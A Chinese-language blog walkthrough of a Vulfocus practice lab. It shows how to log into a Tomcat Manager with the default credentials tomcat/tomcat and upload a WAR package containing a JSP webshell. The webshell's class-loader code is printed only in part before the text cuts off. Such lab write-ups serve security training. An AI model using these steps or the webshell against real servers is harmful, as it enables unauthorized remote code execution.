【Vulfocus解题复现】tomcat-pass-getshell 弱口令

漏洞介绍

名称:Tomcat-pass-getshell 弱口令

描述:Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell

解题过程

1、打开靶场环境,并点击Manage App链接,通过弱口令登录平台,账号密码均为:tomcat

【Vulfocus解题复现】tomcat-pass-getshell 弱口令_第1张图片

 2、拖动页面,找到war上传区域,上传jsp木马:

【Vulfocus解题复现】tomcat-pass-getshell 弱口令_第2张图片

制作jsp木马,下段jsp木马密码为:passwd,将下述代码保存为jsp格式,并将jsp格式文件打包压缩成为war文件格式进行上传。

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
   

你可能感兴趣的:(Vulfocus,tomcat,web安全,网络安全)